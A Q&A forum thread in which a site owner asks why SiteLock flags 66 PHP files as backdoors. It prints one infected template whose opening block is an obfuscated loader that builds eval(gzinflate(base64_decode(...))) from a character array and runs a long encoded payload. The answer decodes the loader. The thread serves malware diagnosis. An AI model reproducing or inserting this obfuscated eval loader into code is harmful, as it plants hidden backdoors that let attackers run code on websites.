Sagar Guhe
Reputation: 1106
PHP files are infected with SiteLock-PHP-BACKDOOR-GENERIC-co.UNOFFICIAL
I tested my site for the infection and found that there are 66 files which are php files that are infected but I am really unable to any malicious code into these files, and also don't know how to remove the infection from these files. below is the screenshot of my scan ->
I checked all these files for the malicious code and also compare it with my old backup but not found any thing suspicious. Also Googled a lot and overflowed stackoverflow with searches but none helped. Please help me out atleast how to trace this virus code.
Here is the code for a single file:
<?php
$md5 = "23423b2hj34j23b4hj23b4jk23bjb4bb34jb";
$aa = array('l','z','v',"s",';',"a",'n',"4",'i',"6",'f',"$",'e',"(",'c',"d",")","o",'b',"t","g",'r',"_");
$ba4 = create_function('$'.'v',$aa[12].$aa[2].$aa[5].$aa[0].$aa[13].$aa[20].$aa[1].$aa[8].$aa[6].$aa[10].$aa[0].$aa[5].$aa[19].$aa[12].$aa[13].$aa[18].$aa[5].$aa[3].$aa[12].$aa[9].$aa[7].$aa[22].$aa[15].$aa[12].$aa[14].$aa[17].$aa[15].$aa[12].$aa[13].$aa[11].$aa[2].$aa[16].$aa[16].$aa[16].$aa[4]);
$ba4('FZdFrsWIkkSX86vkgZnU+gPjNTNPWmZm9ur79RIyMyLyRHmlwz/1107VkB7lP1m6lwT2v0WZz0X5z3/EpBK33Ze33gcX4vTtpIOcURy/1Q6SHVOqCiGtLB9ekkfzKRiwDzRgCoVHBQ0sdEACxkNQUl6HTSPwj27HXZIEt+MxmVnOSjkQEEe05XOri/PUmK5rfQEB9TpAJfnJ2eAyfVvN9u+yZ5QsLdwT8B5AQZIsPUg2BWb/NTN3SRdV3nbz40DClTAqgftZ75srankP0xPcikrjRXDxBdx4yFPLWbFCqThR+d1MnLFzZA7zx8ImfXp3DD3L5XOcXgpU8+ZAivfQODjkx7Z3CWi3izPoMVg/1Fap7Obf+0qA98jVCxnYJPgb2MQg64rpq0v074FQIRU1wruf7FiiG9Of8KiiAbeHi+PnKqg8XIh1dsqFK9PVw4gXTr9PMo75YOiLLEMMrptizkI5J3uhdvs1sIubmyGcZQRa3UbHdGCGWZuKprno94K76/CFNtsAlcihZZrE91d6a3mjfTWOZet4jn5CGS4KLrUOY1PZ6vRLUB0dwuApFhv08LI+51JyPwY5s6pftSXpTvK3dHHNtcDK6sQqBVMILLD8M1POcbQUA1h/cWlTDvHZJny9h55VynFyRhF8Enrjes9u4Ac2lsqkUHsups49pWZK9MkKSn4OIr6b6eDi31Fk03wc9hEZHkjFdWytbWRfOMjYfTSk9YojVVTm8cI0VbZ3N67RCG0uLOYPrwOvgYqvIpdjQiDqsD+0qTRnu7UCfdovAlPOZ+P0Jd/9F/TqFGgMVQVTf0KDRll+3zkEfBYbjjkhBGHJgbjhghjGHJGHJghjgHJGhjgHJGHJgy7776hjbhbbbLHb0qY4yyqTPLx+VVW8b7P0OIxokYMcRhLQ8M0+Ds+7vtazOOTP0MxQQVRxc2AebmHcB+epjGKOWiv9uZ9B9hpjrWmrfapY98VtyK3Wshzy/rY9IlK3u4pI8cE3Mk6sg+RKM3purPmi5mNANzT1eggihGzqRmm5mwQeurKF84QRUwLkWzH3acwsg02qbUghwPZaGZLrHsI6BUszrxPLuwbSLWnmRZAg5NaUw4lEf0a1tk92ZUIDkbQmuLAzeCzv/iSsZKrIO7auxAPrY6puYeFp9iS/Te3Om1etZ0EOYNkNJuO6ymAZl2lMxlYdBJpG0WP0rSP2PBcF00mzWLyvSbYWpClmefOJR17oUXBaLa1vCLOK64mRzObjHmbOW7G1jT9QY+U34XVHVv6i/QsMJUGxngBSxLZxbI11Jv4dQATJmzWhomorkobiFi4lEw9MDEiFAEgU6jjltnbgtfFxbVzsCIjZDZST4J4mshgL7+zYd2uCvXKFqWXI6w0g0/gCacs9+3VFI1PFTX6Mxd7kYWHnn1IYGxhMgPlrvclnH68+2pI86cF16uQkyDnKwQEQDHlHbyrug1bfDNj5DLegEyf6fc1v/ybpo/yf9vpYocvgJTavF9uxb0HlpGx2lQGcyteFMSPTUA7B1gDokgQsmY170LZJURN0vXLpMxplfpiPIy6J4XcTZIgmNqiwaQ0DyI2AKqy2yV3eui7JXlDmmhC5f5yKFeMLVELdOMnQbHGXYbc11jJUAPhi5+Xp+psSjhdupEp8Kr7is8cTQOduoJZr33RptDplFK5EmeV51vs7mpskdpZC90DX0Ozg5Lm4vI71GSid3tZ4nKdMXyk0ktMvrvWlwnK0W+0TI5nsRLI3bvfMbXVxjvjKwK2gFK/fqCNg62Dr7a0n7rc/RzM7H035BbRvo5RrtOBP+rpNGSxd/JYeWfFg4APMHcD2Qjooiq8tVQIOwr8PeK4edvjjtNxrJx91UVZcFogm3A6A1SryW/RnyRKaSUTbufBUDDAVhaMKV9deq4YV2cEqSVq00iBD8iT/a7DrlNpbY0oul6wGKdvzOEeqvPi7wku6IVFV/ZB7EJ0PXJ5Jlxu3HzbAINFZCM/nBBa09avXobE5SnmL5TjW4xdQyWgWziB+OljtWLTNbWsZRJfSN3VOopcxQLJXJRxS3YEgU/GXK5DagrWG80jbUiymsLTopDGzbRmzoSpYTn1AA/Bc5kBSqRoKm1G4BpfVmhyiKIx+NJfV1blySzZYgr5S3Lukwf6pS1w7qdsDIkwEFG+hWL2QKpFAnnWhKwVDr1l9ZjYLyB6N6uxedU5qm+dSY9uQ9M5xqbiI+RLyZG4hpyUF5aV1d1Zk/y3E3DLVK/w4A8d+eRPGdI4oyfOajKnp0r4crlgKFvxchzKAmsIHGMYKGLeIHwKqDX6lbca53i4d5ctaZr6Fc0KpMhKFMrPdD0g/MZ64iht/NWpwMU6vMZmLLlgNc2+qt5TQtGFbvCUuhtcdHQ12E02eYMNljwZj4yi0V6CaejVUFfGMJHumABVymJS3NfE3KbPQ0z+j8yai/yNdKToJHUGHUIGgtcvTYVTYnINIyuguyBVxPjtz/l3hpeWqJJez+8EDY3Oa5M8qcgOvsttw9mwKTgZ8DygZ5xPLpwVoyav9KwUf9dw808wWmPX9ieZA25yH2z5atvVWsZY+J1mGAkeiEvrH6PbjxtWhAZ8qaV7E9Bz6VBJqcQEwNELCmVhgxIWAN+gLeUh2E/8J3UC2LmRYcBhCevKfBQLy9URqk+KFPmCjRL/bsVfA9lH+pD8W39o5/MjV12GcZ6bSD48RBtQJJr4Yw8wbN5cAmiIaHnyYJgmAUMhwMnDX8j3DmYmu6qc+OiL6h9JXHmiw6Ptr3dPg5FEnyZD+Us9j7Ey4MuERE30JTobEMajHkOibIjuuhfswskJfaHySQtMEqFI53H5tT6XhSUs3qq3okLSdt6n9MfyLQEiG7J9Gzdg1B8smWDNaJy6h7wEzZgV5ATzgA5NhuuPsvGvtD6OIDCq2YgJNY3V/U+TrDzhLKE1Yac7SPGH4zHcqZa0vX8rd1kzEQu6RA5q+8PGVSGjsxPjLJv7J1hdXfcwlL4FLSLL++/+ANFLLx1RMpdvVw3BbveX7lnjA5j+HMyFf48ySBCWYDZBoB8Lqe2uYLZw74SAAZ1jPfUPqqfUrNIxDhjP/PPPlzprjxtdsoOotQR8DHmTDuffDcqsTlAmy8x2ihCX3THlMa9aAZ0tiuHJBHbHUByuIONJHIUuygyubhIUGH87yjkbtSON2pmo/fHbILf6Y6cHsW1Qw3Dr+IJScnqu61QCopcs9tFOoPYp4RmTC5V+uTZs/fuCuzVMqTxbsERQuC1ury3XZwr9V0Yx7MCydoyQeFGVQbc7kaikXeu884PTeRuzI7ZqW3DqQp6BggUzY2lGyD3p35f4MJigzOYiPa9hJqwwh+CubIO87j9xDkLr5cUvJAb0WeYokOt+hPztfzM1H/Z7b5FH/roiV4qgZDXX2lEhswnpTbqErRdkJZO6pt7sTa+kX6htSAIN4n479VHs+XhIqcl6omWvDC3+1KBowhtUw/x7I6g6CGep/SmxhjV3wY/oHXl8e0UzZJbQusVh8GH8t7eiUI/kFFaFj2guSPrw64DnCVrPJf31uzLteT9xcx2gDdnaz6QMxJ66I6XvP+Tp12ao3Vi+lozuJjBka6jWukdGLewo/aFhwzzlAsW8vRTHYkXNAM9nGE3gYkxhGjO5qsAFzyj94Js6r5IIW28T73lwF2/4ShmFcRu5H2/CvBAQvFEVB8G+u//73P//+++///B8=');
?>
<?php include 'biComposer/start.php' ?>
<!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8"> <![endif]-->
<!--[if IE 8]> <html class="no-js lt-ie9"> <![endif]-->
<!--[if gt IE 8]><!-->
<html class="no-js"> <!--<![endif]-->
<head>
<title>Lorem Ipsum is simply dummy text </title>
<meta name="description" content="" />
<?php include_partial('meta') ?>
</head>
<body>
<?php include_partial('header', array('caption' => 'about')) ?>
<section class="main">
<div class="content">
<article>
<h1>about us</h1>
<h3>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard</h3>
<p>
Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.
</p>
<div class="txt-align-center" style="margin:40px 0;">
<img src="images/land-acquisition.jpg" alt="">
</div>
<p>
Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has
</p>
<div class="txt-align-center" style="margin:40px 0;">
<img src="images/business-division.jpg" alt="" usemap="#Map">
<map name="Map">
<area shape="rect" coords="46,100,200,158">
<area shape="rect" coords="224,100,380,158">
<area shape="rect" coords="405,100,555,158">
<area shape="rect" coords="582,101,732,159">
</map>
</div>
</article>
</div>
</section>
<?php include_partial('footer') ?>
</body>
<?php include_partial('js') ?>
</html>
Upvotes: 1
Views: 13848
Answers (1)
Matteo Tassinari
Reputation: 18584
So:
$aa[12].$aa[2].$aa[5].$aa[0].$aa[13].$aa[20].$aa[1].$aa[8].$aa[6].$aa[10].$aa[0].$aa[5].$aa[19].$aa[12].$aa[13].$aa[18].$aa[5].$aa[3].$aa[12].$aa[9].$aa[7].$aa[22].$aa[15].$aa[12].$aa[14].$aa[17].$aa[15].$aa[12].$aa[13].$aa[11].$aa[2].$aa[16].$aa[16].$aa[16].$aa[4]
is actually
eval(gzinflate(base64_decode($v)));
however if we set $v as
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
I get a data error using PHP 5.2.5, and the same happens here: http://sandbox.onlinephpfunctions.com/code/f7fb8d6e35bede9f007b2d77ee87e30957825e0a
Upvotes: 2
Related Questions
- How to get rid of "SiteLock-PHP-FILEHACKER-of.UNOFFICIAL" in WordPress functions.php
- Malware uploaded on Server
- malware | my php files on apache server is being changed
- Virus code injected in PHP Files
- Malicious PHP files detected by Host
- How can i remove an iframe virus from all of php files on my website?
- All PHP files getting hacked
- Virus file systems.php on my server?
- Found This Hack in my web server php files
- Cleanup php files from virus